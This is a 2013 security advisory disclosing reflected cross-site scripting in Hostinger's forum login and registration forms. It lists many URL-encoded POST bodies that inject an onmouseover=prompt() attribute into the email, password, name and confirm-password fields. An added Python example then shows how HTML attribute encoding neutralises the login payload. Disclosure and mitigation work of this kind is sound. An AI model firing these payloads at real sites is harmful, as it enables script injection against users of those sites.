
Hostinger Web Hosting Cross Site Scripting

Date: 17 Jun 2013
Reported by: Juan Carlos Garcia
Type: packetstorm
Source: packetstormsecurity.com


Code
`Hostinger Web Hosting Multiple Cross Site Scripting  
  
  
Report-Timeline:  
================  
2013-06-01: Researcher Notification   
2013-06-03: RESPONSE  
2013-06-07: Ask About the issues  
2013-06-10: Vendor Feedback  
2013-06-13: Not Fixed  
2013-06-16: Full Disclosure  
  
  
I-VULNERABILITY  
-------------------------  
#Title: Hostinger Web Hosting Multiple Cross Site Scripting  
  
#Vendor:http://www.hostinger.es  
  
#Author:Juan Carlos García (@secnight)  
  
#Follow me   
http://www.highsec.es  
HTTP://WWW.radio3w.com  
http://hackingmadrid.blogspot.com  
http://blogs.0verl0ad.com  
Twitter:@secnight  
Facebook:https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn  
  
  
II-Introduction:  
=============  
Hostinger® is a free and affordable premium web hosting services provider and domain registrar.  
  
Hostinger has grown from a small web hosting provider into a world leading and industry recognized web hosting brand. Hostinger, UAB is proud to be a part of elite ICANN accredited registrars community.  
  
Hostinger has successfully localized services in Indonesia, Philippines, Spain, Italy, France, Poland, Romania, Lithuania, Brazil, Argentina, Mexico, Colombia, Russia, Ukraine, and many more countries on their way!  
-------------------------  
  
III-PROOF OF CONCEPT  
=============  
  
Affected items  
  
/forum/login (5)  
/forum/register (8)  
  
Attack details  
  
/forum/login   
=============  
  
URL encoded POST input email was set to " onmouseover=prompt(952323) bad="  
The input is reflected inside a tag element between double quotes.  
  
POST /forum/login HTTP/1.1  
  
email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1  
  
VARIANTS  
  
email 2  
-------  
  
email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1  
  
email=%22%20onmouseover%3dprompt%28982999%29%20bad%3d%22&pass=secnight  
  
  
pass 3  
-------  
  
[email protected]&pass=%22%20onmouseover%3dprompt%28952904%29%20bad%3d%22&remember=1  
  
[email protected]&pass=%22%20onmouseover%3dprompt%28935474%29%20bad%3d%22  
  
email=secnight%40email.tst&pass=%22%20onmouseover%3dprompt%28993589%29%20bad%3d%22&remember=1  
  
  
/forum/register  
=============  
  
URL encoded POST input confirmPass was set to " onmouseover=prompt(943546) bad="  
  
The input is reflected inside a tag element between double quotes.  
  
POST /forum/register HTTP/1.1  
  
confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&[email protected]&name=vbhlwxtb&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_chal  
  
  
VARIANTS  
----------  
  
confirmPass 2  
-------------  
  
confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&[email protected]&name=vbhlwxtb&pass=Senight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
confirmPass=%22%20onmouseover%3dprompt%28942726%29%20bad%3d%22&email=secnight%40email.tst&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
  
email 2  
--------  
  
confirmPass=secnight&email=%22%20onmouseover%3dprompt%28982353%29%20bad%3d%22&name=mvjmhkny&pass=Secnightx&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
confirmPass=secnightx&email=%22%20onmouseover%3dprompt%28978014%29%20bad%3d%22&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
Name 2  
-------  
confirmPass=secnight&[email protected]&name=%22%20onmouseover%3dprompt%28981310%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
confirmPass=SECNIGHT&email=secnight%40email.tst&name=%22%20onmouseover%3dprompt%28946111%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
  
pass 2  
-------  
  
confirmPass=secnight&[email protected]&name=augbmecb&pass=%22%20onmouseover%3dprompt%28956301%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
confirmPass=secnightx&email=secnight%40email.tst&name=noeoyclk&pass=%22%20onmouseover%3dprompt%28972091%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
  
IV. CREDITS  
-------------------------  
  
This vulnerability has been discovered  
by Juan Carlos García(@secnight)  
  
  
V. LEGAL NOTICES  
-------------------------  
  
The Author accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`
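
The advisory states that each parameter is "reflected inside a tag element between double quotes". The following is an added example, not code from the advisory or from the vendor: it renders the `/forum/login` request body quoted above into a hypothetical `<input>` template (the forum's real markup is not shown on the page), once verbatim and once with attribute-context encoding, and reports which attributes the browser-side parser would see that the template never declared.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Request body taken from the advisory's /forum/login proof of concept.
POC_BODY = "email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1"

# Hypothetical template: the advisory does not show the forum's real markup.
TEMPLATE = '<input type="text" name="email" value="{value}">'
EXPECTED_ATTRS = {"type", "name", "value"}


def reflected_email(body):
    """Decode the form body the way a server framework would."""
    return parse_qs(body, keep_blank_values=True)["email"][0]


def render_unsafe(value):
    """Reflect the value verbatim, the behaviour the advisory describes."""
    return TEMPLATE.format(value=value)


def render_safe(value):
    """Encode for a double-quoted attribute: & < > " ' become entities."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


class _InputAttrs(HTMLParser):
    """Collect the attribute names of the first <input> tag."""
    attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = {name for name, _ in attrs}


def injected_attrs(markup):
    """Return attribute names present in the tag but absent from the template."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return sorted((parser.attrs or set()) - EXPECTED_ATTRS)


if __name__ == "__main__":
    email = reflected_email(POC_BODY)
    print("verbatim:", injected_attrs(render_unsafe(email)))
    print("encoded: ", injected_attrs(render_safe(email)))
```

The same `injected_attrs` check works as a regression test for every field listed under "Affected items": after the fix, no reflected parameter should be able to add an attribute to the tag that echoes it.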
